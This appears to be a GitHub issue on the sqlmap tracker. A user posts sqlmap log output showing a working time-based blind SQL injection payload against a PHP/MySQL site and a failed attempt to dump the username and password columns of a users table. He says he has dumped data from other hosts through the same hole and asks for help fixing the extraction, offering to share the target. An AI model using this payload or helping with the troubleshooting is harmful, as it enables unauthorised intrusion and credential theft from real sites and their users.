"DBMS: MySQL Unknown" cant fetch data #2960
Description
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 9530 HTTP(s) requests:
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: form_action=ask&page=1&id=ELT(7504=7504,SLEEP(5))
[15:30:03] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:30:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 5.0 (lenny)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL Unknown
[15:30:03] [INFO] fetching entries of column(s) 'password, username' for table 'users' in database 'ast'
[15:30:03] [INFO] fetching number of column(s) 'password, username' entries for table 'users' in database 'ast'
[15:30:03] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[15:30:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[15:30:12] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:30:12] [WARNING] unable to retrieve the number of column(s) 'password, username' entries for table 'users' in database 'ast'
[15:30:12] [INFO] fetched data logged to text files under 'C:\Users\x.sqlmap\output\סס'
[*] shutting down at 15:30:12
This script i have already a bug on it,
Notice : the requested page have a redirect to login when request directly.
I dumped data from other hosts with same injection point, but over many other hosts with same version it gives as shown up,
I used tampers and same issue.
any suggestions? i can send target to check .